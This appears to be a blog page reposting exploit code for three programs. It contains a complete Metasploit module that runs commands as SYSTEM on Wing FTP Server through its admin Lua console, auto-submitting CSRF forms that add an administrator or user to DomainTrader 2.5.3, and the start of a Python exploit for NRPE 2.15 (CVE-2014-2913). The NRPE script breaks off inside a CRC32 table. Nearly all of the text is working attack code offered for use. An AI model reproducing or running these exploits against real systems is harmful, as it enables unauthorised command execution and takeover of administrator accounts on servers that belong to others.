MondoUnix Unix, Linux, FreeBSD, BSD, GNU, Kernel , RHEL, CentOS, Solaris, AIX, HP-UX, Mac OS X, Tru64, SCO UnixWare, Xenix, HOWTO, NETWORKING, IPV6

1Sep/140

Wing FTP Server Authenticated Command Execution

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
  include Msf::Exploit::CmdStager
  include Msf::Exploit::Remote::HttpClient
 
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Wing FTP Server Authenticated Command Execution',
      'Description'    => %q{
        This module exploits the embedded Lua interpreter in the admin web interface for
        versions 4.3.8 and below. When supplying a specially crafted HTTP POST request
        an attacker can use os.execute() to execute arbitrary system commands on
        the target with SYSTEM privileges.
      },
      'Author'         =>
        [
          'Nicholas Nam <nick[at]executionflow.org>'
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'URL', 'http://www.wftpserver.com' ]
        ],
      'Arch'           => ARCH_X86,
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Windows VBS Stager', {} ]
        ],
      'Privileged'     => true,
      'DisclosureDate' => 'Jun 19 2014',
      'DefaultTarget'  => 0
    ))
 
    register_options(
      [
        Opt::RPORT(5466),
        OptString.new('USERNAME', [true, 'Admin username', '']),
        OptString.new('PASSWORD', [true, 'Admin password', ''])
      ], self.class
    )
    deregister_options('CMDSTAGER::FLAVOR')
  end
 
  def check
    res = send_request_cgi(
      {
        'uri'     =>  '/admin_login.html',
        'method'  => 'GET'
      })
 
    if !res
      fail_with(Failure::Unreachable, "#{peer} - Admin login page was unreachable.")
    elsif res.code != 200
      fail_with(Failure::NotFound, "#{peer} - Admin login page was not found.")
    elsif res.body =~ /Wing FTP Server Administrator/ && res.body =~ /2003-2014 <b>wftpserver.com<\/b>/
      return Exploit::CheckCode::Appears
    end
 
    Exploit::CheckCode::Safe
  end
 
  def exploit
    username = datastore['USERNAME']
    password = datastore['PASSWORD']
    @session_cookie = authenticate(username, password)
 
    print_status("#{peer} - Sending payload")
    # Execute the cmdstager, max length of the commands is ~1500
    execute_cmdstager(flavor: :vbs, linemax: 1500)
  end
 
  def execute_command(cmd, _opts = {})
    command = "os.execute('cmd /c #{cmd}')"
 
    res = send_request_cgi(
      'uri'       => '/admin_lua_script.html',
      'method'    => 'POST',
      'cookie'    => @session_cookie,
      'vars_post' => { 'command' => command }
    )
 
    if res && res.code != 200
      fail_with(Failure::Unkown, "#{peer} - Something went wrong.")
    end
  end
 
  def authenticate(username, password)
    print_status("#{peer} - Authenticating")
    res = send_request_cgi(
      'uri'       => '/admin_loginok.html',
      'method'    => 'POST',
      'vars_post' => {
        'username'     => username,
        'password'     => password,
        'username_val' => username,
        'password_val' => password,
        'submit_btn'   => '+Login+'
      }
    )
 
    uidadmin = ''
    if !res
      fail_with(Failure::Unreachable, "#{peer} - Admin login page was unreachable.")
    elsif res.code == 200 && res.body =~ /location='main.html\?lang=english';/
      res.get_cookies.split(';').each do |cookie|
        cookie.split(',').each do |value|
          uidadmin = value.split('=')[1] if value.split('=')[0] =~ /UIDADMIN/
        end
      end
    else
      fail_with(Failure::NoAccess, "#{peer} - Authentication failed")
    end
 
    "UIDADMIN=#{uidadmin}"
  end
end

(18)

31Aug/140

DomainTrader Domain Parking / Auction Script 2.5.3 CSRF / XSS

# Exploit Title: DomainTrader Domain Parking and Auction Script Multiple 0day Vulnerabilities
# Google Dork: Find yourself xD
# Date: 26/8/2014
# Exploit Author: Haider Mahmood | @HaiderMQ
# Vendor Homepage: http://www.smartscriptsolutions.com/domain-trader/
# Version: Tested on Latest Version 2.5.3
 
Add new administrator CSRF:
 
 
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.6.1/jquery.min.js"></script>
<script type="text/javascript">
  $(document).ready(function() {
    window.document.forms[0].submit();
  });
</script>
 <form name="add_admin" id="add_admin" method="post" action="victim.com/admin/admincp.php">
    <input type="hidden" name="mode" value="addadminuser" />
      <table width="400" border="0" cellspacing="0" cellpadding="0">
        <tr>
          <td>Username:</td>
          <td><input name="username" type="text" value="USERNAME" /></td>
        </tr>
        <tr>
          <td>Email Address:</td>
          <td><input name="email_address" type="text" value="EMAIL_ADDRESS" /></td>
        </tr>
        <tr>
          <td>Password:</td>
          <td><input name="password" type="text" value="DESIRED_PASSWORD" /></td>
        </tr>
        <tr>
          <td><input name="submit" type="submit" value="Add User" /></td>
          <td>&nbsp;</td>
        </tr>
      </table>
    </form>
 
 
Add new user CSRF:
 
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.6.1/jquery.min.js"></script>
<script type="text/javascript">
  $(document).ready(function() {
    window.document.forms[0].submit();
  });
</script>
<form name="add_user" id="add_user" method="post" action="victim.com/admin/admincp.php">
    <input type="hidden" name="mode" value="addnewuser">
      <table width="500" border="0" cellspacing="0" cellpadding="0">
          <tr>
            <td><span>Username:</span></td>
            <td><input type="text" name="user_name" id="user_name" value="USERNAME_VALUE"></td>
          </tr>
          <tr>
            <td><span>Password:</span></td>
            <td><input type="password" name="newpassword" id="newpassword" value="DESIRED_PASSWORD"></td>
          </tr>
          <tr>
            <td><span>Confirm Password:</span></td>
            <td><input type="password" name="cnewpassword" id="cnewpassword" value="DESIRED_PASSWORD"></td>
          </tr>
          <tr>
            <td width="200"><span>First Name:</span></td>
            <td width="300"><input type="text" name="first_name" id="first_name" value="FIRSTNAME"></td>
          </tr>
          <tr>
            <td><span>Last Name:</span></td>
            <td><input type="text" name="last_name" id="last_name" value="LASTNAME"></td>
          </tr>
          <tr>
            <td><span>Email Address:</span></td>
            <td><input type="text" name="email_address" id="email_address" value="DESIRED_VALUE"></td>
          </tr>
          <tr>
            <td><span>Telephone:</span></td>
            <td><input type="text" name="telephone" id="telephone" value="010101010"></td>
          </tr>
          <tr>
            <td><span>Street Address:</span></td>
            <td><input type="text" name="street_address" id="street_address" value="BLA_BLA_BLA"></td>
          </tr>
          <tr>
            <td><span>City:</span></td>
            <td><input type="text" name="city" id="city" value="BLA_BLA_BLA"></td>
          </tr>
          <tr>
            <td><span>County/State:</span></td>
            <td><input type="text" name="county" id="county" value="BLA_BLA_BLA"></td>
          </tr>
          <tr>
            <td><span>Postcode/Zipcode:</span></td>
            <td><input type="text" name="postcode" id="postcode" value="BLA_BLA_BLA"></td>
          </tr>
          <tr>
            <td><span>Country:</span></td>
            <td>
              <select name="country" id="country">
                                                  <option value="AFGHANISTAN">AFGHANISTAN</option>
                                                                  <option value="ALBANIA">ALBANIA</option>
                                                                  <option value="ALGERIA">ALGERIA</option>
                                                                  <option value="AMERICAN SAMOA">AMERICAN SAMOA</option>
                                                                  <option value="ANDORRA">ANDORRA</option>
                                                                  <option value="ANGOLA">ANGOLA</option>
                                                                  <option value="ANTIGUA AND BARBUDA">ANTIGUA AND BARBUDA</option>
                                                                  <option value="ARGENTINA">ARGENTINA</option>
                                                                  <option value="ARMENIA">ARMENIA</option>
                                                                  <option value="ARUBA">ARUBA</option>
                                                                  <option value="AUSTRALIA">AUSTRALIA</option>
                                                                  <option value="AUSTRIA">AUSTRIA</option>
                                                                  <option value="AZERBAIJAN">AZERBAIJAN</option>
                                                                  <option value="BAHAMAS">BAHAMAS</option>
                                                                  <option value="BAHRAIN">BAHRAIN</option>
                                                                  <option value="BANGLADESH">BANGLADESH</option>
                                                                  <option value="BARBADOS">BARBADOS</option>
                                                                  <option value="BELARUS">BELARUS</option>
                                                                  <option value="BELGIUM">BELGIUM</option>
                                                                  <option value="BELIZE">BELIZE</option>
                                                                  <option value="BENIN">BENIN</option>
                                                                  <option value="BERMUDA">BERMUDA</option>
                                                                  <option value="BHUTAN">BHUTAN</option>
                                                                  <option value="BOLIVIA">BOLIVIA</option>
                                                                  <option value="BOSNIA AND HERZEGOVINA">BOSNIA AND HERZEGOVINA</option>
                                                                  <option value="BOTSWANA">BOTSWANA</option>
                                                                  <option value="BRAZIL">BRAZIL</option>
                                                                  <option value="BRITISH INDIAN OCEAN TERRITORY">BRITISH INDIAN OCEAN TERRITORY</option>
                                                                  <option value="BRUNEI DARUSSALAM">BRUNEI DARUSSALAM</option>
                                                                  <option value="BULGARIA">BULGARIA</option>
                                                                  <option value="BURKINA FASO">BURKINA FASO</option>
                                                                  <option value="BURUNDI">BURUNDI</option>
                                                                  <option value="CAMBODIA">CAMBODIA</option>
                                                                  <option value="CAMEROON">CAMEROON</option>
                                                                  <option value="CANADA">CANADA</option>
                                                                  <option value="CAPE VERDE">CAPE VERDE</option>
                                                                  <option value="CAYMAN ISLANDS">CAYMAN ISLANDS</option>
                                                                  <option value="CENTRAL AFRICAN REPUBLIC">CENTRAL AFRICAN REPUBLIC</option>
                                                                  <option value="CHAD">CHAD</option>
                                                                  <option value="CHILE">CHILE</option>
                                                                  <option value="CHINA">CHINA</option>
                                                                  <option value="COLOMBIA">COLOMBIA</option>
                                                                  <option value="COMOROS">COMOROS</option>
                                                                  <option value="CONGO">CONGO</option>
                                                                  <option value="COOK ISLANDS">COOK ISLANDS</option>
                                                                  <option value="COSTA RICA">COSTA RICA</option>
                                                                  <option value="COTE D'IVOIRE">COTE D'IVOIRE</option>
                                                                  <option value="CROATIA">CROATIA</option>
                                                                  <option value="CUBA">CUBA</option>
                                                                  <option value="CYPRUS">CYPRUS</option>
                                                                  <option value="CZECH REPUBLIC">CZECH REPUBLIC</option>
                                                                  <option value="DENMARK">DENMARK</option>
                                                                  <option value="DJIBOUTI">DJIBOUTI</option>
                                                                  <option value="DOMINICA">DOMINICA</option>
                                                                  <option value="DOMINICAN REPUBLIC">DOMINICAN REPUBLIC</option>
                                                                  <option value="ECUADOR">ECUADOR</option>
                                                                  <option value="EGYPT">EGYPT</option>
                                                                  <option value="EL SALVADOR">EL SALVADOR</option>
                                                                  <option value="EQUATORIAL GUINEA">EQUATORIAL GUINEA</option>
                                                                  <option value="ERITREA">ERITREA</option>
                                                                  <option value="ESTONIA">ESTONIA</option>
                                                                  <option value="ETHIOPIA">ETHIOPIA</option>
                                                                  <option value="FALKLAND ISLANDS (MALVINAS)">FALKLAND ISLANDS (MALVINAS)</option>
                                                                  <option value="FAROE ISLANDS">FAROE ISLANDS</option>
                                                                  <option value="FEDERATED STATES OF MICRONESIA">FEDERATED STATES OF MICRONESIA</option>
                                                                  <option value="FIJI">FIJI</option>
                                                                  <option value="FINLAND">FINLAND</option>
                                                                  <option value="FRANCE">FRANCE</option>
                                                                  <option value="FRENCH GUIANA">FRENCH GUIANA</option>
                                                                  <option value="FRENCH POLYNESIA">FRENCH POLYNESIA</option>
                                                                  <option value="FRENCH SOUTHERN TERRITORIES">FRENCH SOUTHERN TERRITORIES</option>
                                                                  <option value="GABON">GABON</option>
                                                                  <option value="GAMBIA">GAMBIA</option>
                                                                  <option value="GEORGIA">GEORGIA</option>
                                                                  <option value="GERMANY">GERMANY</option>
                                                                  <option value="GHANA">GHANA</option>
                                                                  <option value="GIBRALTAR">GIBRALTAR</option>
                                                                  <option value="GREECE">GREECE</option>
                                                                  <option value="GREENLAND">GREENLAND</option>
                                                                  <option value="GRENADA">GRENADA</option>
                                                                  <option value="GUADELOUPE">GUADELOUPE</option>
                                                                  <option value="GUAM">GUAM</option>
                                                                  <option value="GUATEMALA">GUATEMALA</option>
                                                                  <option value="GUINEA">GUINEA</option>
                                                                  <option value="GUINEA-BISSAU">GUINEA-BISSAU</option>
                                                                  <option value="GUYANA">GUYANA</option>
                                                                  <option value="HAITI">HAITI</option>
                                                                  <option value="HOLY SEE (VATICAN CITY STATE)">HOLY SEE (VATICAN CITY STATE)</option>
                                                                  <option value="HONDURAS">HONDURAS</option>
                                                                  <option value="HONG KONG">HONG KONG</option>
                                                                  <option value="HUNGARY">HUNGARY</option>
                                                                  <option value="ICELAND">ICELAND</option>
                                                                  <option value="INDIA">INDIA</option>
                                                                  <option value="INDONESIA">INDONESIA</option>
                                                                  <option value="IRAQ">IRAQ</option>
                                                                  <option value="IRELAND">IRELAND</option>
                                                                  <option value="ISLAMIC REPUBLIC OF IRAN">ISLAMIC REPUBLIC OF IRAN</option>
                                                                  <option value="ISRAEL">ISRAEL</option>
                                                                  <option value="ITALY">ITALY</option>
                                                                  <option value="JAMAICA">JAMAICA</option>
                                                                  <option value="JAPAN">JAPAN</option>
                                                                  <option value="JORDAN">JORDAN</option>
                                                                  <option value="KAZAKHSTAN">KAZAKHSTAN</option>
                                                                  <option value="KENYA">KENYA</option>
                                                                  <option value="KIRIBATI">KIRIBATI</option>
                                                                  <option value="KUWAIT">KUWAIT</option>
                                                                  <option value="KYRGYZSTAN">KYRGYZSTAN</option>
                                                                  <option value="LAO PEOPLE'S DEMOCRATIC REPUBLIC">LAO PEOPLE'S DEMOCRATIC REPUBLIC</option>
                                                                  <option value="LATVIA">LATVIA</option>
                                                                  <option value="LEBANON">LEBANON</option>
                                                                  <option value="LESOTHO">LESOTHO</option>
                                                                  <option value="LIBERIA">LIBERIA</option>
                                                                  <option value="LIBYAN ARAB JAMAHIRIYA">LIBYAN ARAB JAMAHIRIYA</option>
                                                                  <option value="LIECHTENSTEIN">LIECHTENSTEIN</option>
                                                                  <option value="LITHUANIA">LITHUANIA</option>
                                                                  <option value="LUXEMBOURG">LUXEMBOURG</option>
                                                                  <option value="MACAO">MACAO</option>
                                                                  <option value="MADAGASCAR">MADAGASCAR</option>
                                                                  <option value="MALAWI">MALAWI</option>
                                                                  <option value="MALAYSIA">MALAYSIA</option>
                                                                  <option value="MALDIVES">MALDIVES</option>
                                                                  <option value="MALI">MALI</option>
                                                                  <option value="MALTA">MALTA</option>
                                                                  <option value="MARSHALL ISLANDS">MARSHALL ISLANDS</option>
                                                                  <option value="MARTINIQUE">MARTINIQUE</option>
                                                                  <option value="MAURITANIA">MAURITANIA</option>
                                                                  <option value="MAURITIUS">MAURITIUS</option>
                                                                  <option value="MEXICO">MEXICO</option>
                                                                  <option value="MONACO">MONACO</option>
                                                                  <option value="MONGOLIA">MONGOLIA</option>
                                                                  <option value="MOROCCO">MOROCCO</option>
                                                                  <option value="MOZAMBIQUE">MOZAMBIQUE</option>
                                                                  <option value="MYANMAR">MYANMAR</option>
                                                                  <option value="NAMIBIA">NAMIBIA</option>
                                                                  <option value="NAURU">NAURU</option>
                                                                  <option value="NEPAL">NEPAL</option>
                                                                  <option value="NETHERLANDS">NETHERLANDS</option>
                                                                  <option value="NETHERLANDS ANTILLES">NETHERLANDS ANTILLES</option>
                                                                  <option value="NEW CALEDONIA">NEW CALEDONIA</option>
                                                                  <option value="NEW ZEALAND">NEW ZEALAND</option>
                                                                  <option value="NICARAGUA">NICARAGUA</option>
                                                                  <option value="NIGER">NIGER</option>
                                                                  <option value="NIGERIA">NIGERIA</option>
                                                                  <option value="NORTHERN MARIANA ISLANDS">NORTHERN MARIANA ISLANDS</option>
                                                                  <option value="NORWAY">NORWAY</option>
                                                                  <option value="OMAN">OMAN</option>
                                                                  <option value="PAKISTAN">PAKISTAN</option>
                                                                  <option value="PALAU">PALAU</option>
                                                                  <option value="PALESTINIAN TERRITORY">PALESTINIAN TERRITORY</option>
                                                                  <option value="PANAMA">PANAMA</option>
                                                                  <option value="PAPUA NEW GUINEA">PAPUA NEW GUINEA</option>
                                                                  <option value="PARAGUAY">PARAGUAY</option>
                                                                  <option value="PERU">PERU</option>
                                                                  <option value="PHILIPPINES">PHILIPPINES</option>
                                                                  <option value="POLAND">POLAND</option>
                                                                  <option value="PORTUGAL">PORTUGAL</option>
                                                                  <option value="PUERTO RICO">PUERTO RICO</option>
                                                                  <option value="QATAR">QATAR</option>
                                                                  <option value="REPUBLIC OF KOREA">REPUBLIC OF KOREA</option>
                                                                  <option value="REPUBLIC OF MOLDOVA">REPUBLIC OF MOLDOVA</option>
                                                                  <option value="REUNION">REUNION</option>
                                                                  <option value="ROMANIA">ROMANIA</option>
                                                                  <option value="RUSSIAN FEDERATION">RUSSIAN FEDERATION</option>
                                                                  <option value="RWANDA">RWANDA</option>
                                                                  <option value="SAINT KITTS AND NEVIS">SAINT KITTS AND NEVIS</option>
                                                                  <option value="SAINT LUCIA">SAINT LUCIA</option>
                                                                  <option value="SAINT VINCENT AND THE GRENADINES">SAINT VINCENT AND THE GRENADINES</option>
                                                                  <option value="SAMOA">SAMOA</option>
                                                                  <option value="SAN MARINO">SAN MARINO</option>
                                                                  <option value="SAO TOME AND PRINCIPE">SAO TOME AND PRINCIPE</option>
                                                                  <option value="SAUDI ARABIA">SAUDI ARABIA</option>
                                                                  <option value="SENEGAL">SENEGAL</option>
                                                                  <option value="SERBIA AND MONTENEGRO">SERBIA AND MONTENEGRO</option>
                                                                  <option value="SEYCHELLES">SEYCHELLES</option>
                                                                  <option value="SIERRA LEONE">SIERRA LEONE</option>
                                                                  <option value="SINGAPORE">SINGAPORE</option>
                                                                  <option value="SLOVAKIA">SLOVAKIA</option>
                                                                  <option value="SLOVENIA">SLOVENIA</option>
                                                                  <option value="SOLOMON ISLANDS">SOLOMON ISLANDS</option>
                                                                  <option value="SOMALIA">SOMALIA</option>
                                                                  <option value="SOUTH AFRICA">SOUTH AFRICA</option>
                                                                  <option value="SPAIN">SPAIN</option>
                                                                  <option value="SRI LANKA">SRI LANKA</option>
                                                                  <option value="SUDAN">SUDAN</option>
                                                                  <option value="SURINAME">SURINAME</option>
                                                                  <option value="SWAZILAND">SWAZILAND</option>
                                                                  <option value="SWEDEN">SWEDEN</option>
                                                                  <option value="SWITZERLAND">SWITZERLAND</option>
                                                                  <option value="SYRIAN ARAB REPUBLIC">SYRIAN ARAB REPUBLIC</option>
                                                                  <option value="TAIWAN">TAIWAN</option>
                                                                  <option value="TAJIKISTAN">TAJIKISTAN</option>
                                                                  <option value="THAILAND">THAILAND</option>
                                                                  <option value="THE DEMOCRATIC REPUBLIC OF THE CONGO">THE DEMOCRATIC REPUBLIC OF THE CONGO</option>
                                                                  <option value="THE FORMER GOSLAV REPUBLIC OF MACEDONIA">THE FORMER GOSLAV REPUBLIC OF MACEDONIA</option>
                                                                  <option value="TIMOR-LESTE">TIMOR-LESTE</option>
                                                                  <option value="TOGO">TOGO</option>
                                                                  <option value="TOKELAU">TOKELAU</option>
                                                                  <option value="TONGA">TONGA</option>
                                                                  <option value="TRINIDAD AND TOBAGO">TRINIDAD AND TOBAGO</option>
                                                                  <option value="TUNISIA">TUNISIA</option>
                                                                  <option value="TURKEY">TURKEY</option>
                                                                  <option value="TURKMENISTAN">TURKMENISTAN</option>
                                                                  <option value="TUVALU">TUVALU</option>
                                                                  <option value="UGANDA">UGANDA</option>
                                                                  <option value="UKRAINE">UKRAINE</option>
                                                                  <option value="UNITED ARAB EMIRATES">UNITED ARAB EMIRATES</option>
                                                                  <option value="UNITED KINGDOM">UNITED KINGDOM</option>
                                                                  <option value="UNITED REPUBLIC OF TANZANIA">UNITED REPUBLIC OF TANZANIA</option>
                                                                  <option value="UNITED STATES">UNITED STATES</option>
                                                                  <option value="URUGUAY">URUGUAY</option>
                                                                  <option value="UZBEKISTAN">UZBEKISTAN</option>
                                                                  <option value="VANUATU">VANUATU</option>
                                                                  <option value="VENEZUELA">VENEZUELA</option>
                                                                  <option value="VIET NAM">VIET NAM</option>
                                                                  <option value="VIRGIN ISLANDS">VIRGIN ISLANDS</option>
                                                                  <option value="VIRGIN ISLANDS">VIRGIN ISLANDS</option>
                                                                  <option value="YEMEN">YEMEN</option>
                                                                  <option value="ZAMBIA">ZAMBIA</option>
                                                                  <option value="ZIMBABWE">ZIMBABWE</option>
                                              </select>
            </td>
          </tr>
          <tr>
            <td colspan="2"><input name="new_message_notify" type="checkbox" value="1"  /><span>Notify me by email when I receive a new message.</span></td>
          </tr>
          <tr>
            <td colspan="2"><input name="offer_received_notify" type="checkbox" value="1"  /><span>Notify me by email when I receive a new offer.</span></td>
          </tr>
          <tr>
            <td colspan="2"><input name="offer_accepted_notify" type="checkbox" value="1"  /><span>Notify me when an offer I made is accepted.</span></td>
          </tr>
          <tr>
            <td colspan="2"><input name="offer_cancelled_notify" type="checkbox" value="1"  /><span>Notify me when an offer I made is cancelled</span></td>
          </tr>
          <tr>
            <td colspan="2"><input name="counter_offer_notify" type="checkbox" value="1"  /><span>Notify me by email when a counter offer is made on a domain I own or am bidding on.</span></td>
          </tr>
          <tr>
            <td colspan="2"><input name="domain_pushed_notify" type="checkbox" value="1"  /><span>Notify me by email when a domain is pushed.</span></td>
          </tr>
          <tr>
            <td colspan="2"><input name="sale_complete_notify" type="checkbox" value="1"  /><span>Notify me by email when a domain sale is complete.</span></td>
          </tr>
          <tr>
            <td colspan="2"><input type="submit" name="Submit" value="Submit"></td>
          </tr>
        </table>
    </form>
 
 
XSS:
 
Add new Administrator values are not properly sanitized, neither on inserting into the database or selecting from the database causing Persistent XSS

(45)

31Aug/140

NRPE 2.15 Remote Command Execution

#!/usr/bin/python
#
#
# Exploit Title : NRPE <= 2.15 Remote Code Execution Vulnerability
#
# Discovered by  : Dawid Golunski
#                  dawid (at) legalhackers (dot) com
#                  legalhackers.com
#
# Exploit Author : Claudio Viviani
#                  http://www.homelab.it
#
#                  info@homelab.it
#                  homelabit@protonmail.ch
#
#                  https://www.facebook.com/homelabit
#                  https://twitter.com/homelabit
#                  https://plus.google.com/+HomelabIt1/
#                  https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
#
#
#
# C crc32 function ripped from check_nrpe_clone by Alan Brenner <alan.brenner@ithaka.org>
#                                       http://www.abcompcons.com/files/nrpe_client.py
#
# pyOpenSSL Library required (http://pyopenssl.sourceforge.net/)
#
# [root@localhost ~]# pip-python install pyOpenSSL
#
# NRPE <= 2.15 Remote Command Execution Vulnerability
# Release date: 17.04.2014
# Discovered by: Dawid Golunski
# Severity: High
# CVE-2014-2913
#
# http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2913
# http://www.exploit-db.com/exploits/32925/
# http://www.homelab.it/index.php/2014/05/03/nagios-nrpe-remote-command-injection-test-fix/ (ITA)
#
# Tested on CentOS 5.x, CentOS 6.x, BacBox 3.x, KaliLinux 1.0.6 with Python 2.x
#
# Demo: https://www.youtube.com/watch?v=nmYiBdnWWcE
#
 
import OpenSSL # non-standard, see http://pyopenssl.sourceforge.net/
import optparse
import os
import signal
import socket
import struct
import sys
import time
 
banner = """
 
$$\   $$\ $$$$$$$\  $$$$$$$\  $$$$$$$$\        $$$$$$\        $$\  $$$$$$$\\
$$$\  $$ |$$  __$$\ $$  __$$\ $$  _____|      $$  __$$\     $$$$ | $$  ____|
$$$$\ $$ |$$ |  $$ |$$ |  $$ |$$ |            \__/  $$ |    \_$$ | $$ |
$$ $$\$$ |$$$$$$$  |$$$$$$$  |$$$$$\           $$$$$$  |      $$ | $$$$$$$\\
$$ \$$$$ |$$  __$$< $$  ____/ $$  __|         $$  ____/       $$ | \_____$$\\
$$ |\$$$ |$$ |  $$ |$$ |      $$ |            $$ |            $$ | $$\   $$ |
$$ | \$$ |$$ |  $$ |$$ |      $$$$$$$$\       $$$$$$$$\ $$\ $$$$$$\\$$$$$$  |
\__|  \__|\__|  \__|\__|      \________|      \________|\__|\______|\______/
 
 
 
                  $$$$$$$\   $$$$$$\  $$$$$$$$\\
                  $$  __$$\ $$  __$$\ $$  _____|
                  $$ |  $$ |$$ /  \__|$$ |
                  $$$$$$$  |$$ |      $$$$$\\
                  $$  __$$< $$ |      $$  __|
                  $$ |  $$ |$$ |  $$\ $$ |
                  $$ |  $$ |\$$$$$$  |$$$$$$$$\\
                  \__|  \__| \______/ \________|
                                                   NRPE <= 2.15 R3m0t3 C0mm4nd Ex3cut10n
 
 
                =============================================
                - Release date: 17.04.2014
                - Discovered by: Dawid Golunski
                - Severity: High
                - CVE: 2014-2913
                =============================================
 
                                Written by:
 
                              Claudio Viviani
 
                           http://www.homelab.it
 
                              info@homelab.it
                           homelabit@protonmail.ch
 
                      https://www.facebook.com/homelabit
                      https://twitter.com/homelabit
                      https://plus.google.com/+HomelabIt1/
            https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
 
"""
# Plugin list for Brute force mode
PluginList = ['check_all',
             'check_apt',
             'check_bdii',
             'check_bonding',
             'check_breeze',
             'check_by_ssh',
             'check_check-updates',
             'check_check_sip',
             'check_cluster',
             'check_dhcp',
             'check_dig',
             'check_disk',
             'check_disk_smb',
             'check_dns',
             'check_dpm-disk',
             'check_dpm-head',
             'check_dummy',
             'check_file_age',
             'check_flexlm',
             'check_fping',
             'check_game',
             'check_hpjd',
             'check_http',
             'check_icmp',
             'check_ide_smart',
             'check_ifoperstatus',
             'check_ifstatus',
             'check_ircd',
             'check_lcgdm',
             'check_lcgdm-common',
             'check_ldap',
             'check_lfc',
             'check_linux_raid',
             'check_load',
             'check_log',
             'check_mailq',
             'check_mrtg',
             'check_mrtgtraf',
             'check_mysql',
             'check_nagios',
             'check_nrpe',
             'check_nt',
             'check_ntp',
             'check_nwstat',
             'check_openmanage',
             'check_oracle',
             'check_overcr',
             'check_perl',
             'check_pgsql',
             'check_ping',
             'check_procs',
             'check_radius',
             'check_real',
             'check_rhev',
             'check_rpc',
             'check_sensors',
             'check_smtp',
             'check_snmp',
             'check_ssh',
             'check_swap',
             'check_tcp',
             'check_time',
             'check_ups',
             'check_users',
             'check_wave']
 
 
 
# nrpe 2.15 skip chars "|`&><'\"\\[]{};" and "$()" but not "\x0a"(new line)
evilchar = "\x0a"
 
QUERY_PACKET    = 1
RESPONSE_PACKET = 2
 
NRPE_PACKET_VERSION_2 = 2
 
# max amount of data we'll send in one query/response
MAX_PACKETBUFFER_LENGTH = 1024
 
 
#def debug(sMessage):
#    """Send a string to STDERR"""
#    if DEBUG:
#        sys.stderr.write("%s\n" % sMessage)
 
class DataPacket:
    """A Python implementation of the C struct, packet."""
    def __init__(self, packet_version, packet_type):
        self.nPacketVersion = packet_version # int16
        self.nPacketType = packet_type # int16
        self.nCRC32 = 0 # u_int32
        self.nResultCode = 2324 # int16
        self.sData = ''
        self.tCRC32 = (
             0x00000000, 0x77073096, 0xee0e612c, 0x990951ba, 0x076dc419,
             0x706af48f, 0xe963a535, 0x9e6495a3, 0x0edb8832, 0x79dcb8a4,
             0xe0d5e91e, 0x97d2d988, 0x09b64c2b, 0x7eb17cbd, 0xe7b82d07,
             0x90bf1d91, 0x1db71064, 0x6ab020f2, 0xf3b97148, 0x84be41de,
             0x1adad47d, 0x6ddde4eb, 0xf4d4b551, 0x83d385c7, 0x136c9856,
             0x646ba8c0, 0xfd62f97a, 0x8a65c9ec, 0x14015c4f, 0x63066cd9,
             0xfa0f3d63, 0x8d080df5, 0x3b6e20c8, 0x4c69105e, 0xd56041e4,
             0xa2677172, 0x3c03e4d1, 0x4b04d447, 0xd20d85fd, 0xa50ab56b,
             0x35b5a8fa, 0x42b2986c, 0xdbbbc9d6, 0xacbcf940, 0x32d86ce3,
             0x45df5c75, 0xdcd60dcf, 0xabd13d59, 0x26d930ac, 0x51de003a,
             0xc8d75180, 0xbfd06116, 0x21b4f4b5, 0x56b3c423, 0xcfba9599,
             0xb8bda50f, 0x2802b89e, 0x5f058808, 0xc60cd9b2, 0xb10be924,
             0x2f6f7c87, 0x58684c11, 0xc1611dab, 0xb6662d3d, 0x76dc4190,
             0x01db7106, 0x98d220bc, 0xefd5102a, 0x71b18589, 0x06b6b51f,
             0x9fbfe4a5, 0xe8b8d433, 0x7807c9a2, 0x0f00f934, 0x9609a88e,
             0xe10e9818, 0x7f6a0dbb, 0x086d3d2d, 0x91646c97, 0xe6635c01,
             0x6b6b51f4, 0x1c6c6162, 0x856530d8, 0xf262004e, 0x6c0695ed,
             0x1b01a57b, 0x8208f4c1, 0xf50fc457, 0x65b0d9c6, 0x12b7e950,
             0x8bbeb8ea, 0xfcb9887c, 0x62dd1ddf, 0x15da2d49, 0x8cd37cf3,
             0xfbd44c65, 0x4db26158, 0x3ab551ce, 0xa3bc0074, 0xd4bb30e2,
             0x4adfa541, 0x3dd895d7, 0xa4d1c46d, 0xd3d6f4fb, 0x4369e96a,
             0x346ed9fc, 0xad678846, 0xda60b8d0, 0x44042d73, 0x33031de5,
             0xaa0a4c5f, 0xdd0d7cc9, 0x5005713c, 0x270241aa, 0xbe0b1010,
             0xc90c2086, 0x5768b525, 0x206f85b3, 0xb966d409, 0xce61e49f,
             0x5edef90e, 0x29d9c998, 0xb0d09822, 0xc7d7a8b4, 0x59b33d17,
             0x2eb40d81, 0xb7bd5c3b, 0xc0ba6cad, 0xedb88320, 0x9abfb3b6,
             0x03b6e20c, 0x74b1d29a, 0xead54739, 0x9dd277af, 0x04db2615,
             0x73dc1683, 0xe3630b12, 0x94643b84, 0x0d6d6a3e, 0x7a6a5aa8,
             0xe40ecf0b, 0x9309ff9d, 0x0a00ae27, 0x7d079eb1, 0xf00f9344,
             0x8708a3d2, 0x1e01f268, 0x6906c2fe, 0xf762575d, 0x806567cb,
             0x196c3671, 0x6e6b06e7, 0xfed41b76, 0x89d32be0, 0x10da7a5a,
             0x67dd4acc, 0xf9b9df6f, 0x8ebeeff9, 0x17b7be43, 0x60b08ed5,
             0xd6d6a3e8, 0xa1d1937e, 0x38d8c2c4, 0x4fdff252, 0xd1bb67f1,
             0xa6bc5767, 0x3fb506dd, 0x48b2364b, 0xd80d2bda, 0xaf0a1b4c,
             0x36034af6, 0x41047a60, 0xdf60efc3, 0xa867df55, 0x316e8eef,
             0x4669be79, 0xcb61b38c, 0xbc66831a, 0x256fd2a0, 0x5268e236,
             0xcc0c7795, 0xbb0b4703, 0x220216b9, 0x5505262f, 0xc5ba3bbe,
             0xb2bd0b28, 0x2bb45a92, 0x5cb36a04, 0xc2d7ffa7, 0xb5d0cf31,
